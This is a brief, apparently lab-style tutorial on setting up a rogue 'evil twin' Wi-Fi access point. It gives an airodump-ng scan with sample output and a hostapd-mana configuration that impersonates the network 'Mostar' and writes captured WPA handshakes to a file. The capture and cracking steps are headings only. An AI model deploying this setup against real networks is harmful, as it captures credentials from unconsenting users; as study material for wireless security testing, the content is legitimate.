Setting up a Rogue Access Point
1. Finding target
sudo airodump-ng -w discovery --output-format pcap wlan0BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
CD:C2:25:9A:47:BA -45 3 2 0 6 195 WPA2 CCMP MGT Sarajevo
94:36:45:CA:71:61 -46 3 4 0 6 195 WPA2 CCMP PSK Zagreb
FC:7A:2B:88:63:EF -53 5 0 0 1 130 WPA2 CCMP PSK Mostar
1E:E1:3E:95:52:7D -87 2 0 0 11 130 OPN Budva
85:28:13:AE:50:5C -91 3 0 0 11 130 WPA2 CCMP PSK Beograd2. Configuring AP using hostapd-mana
interface=wlan0
ssid=Mostar
channel=1
hw_mode=g
ieee80211n=1
wpa=3
wpa_key_mgmt=WPA-PSK
wpa_passphrase=ANYPASSWORD
wpa_pairwise=TKIP
rsn_pairwise=TKIP CCMP
mana_wpaout=/home/kali/mostar.hccapx3. Capturing handshakes
4. Cracking hashes
Last updated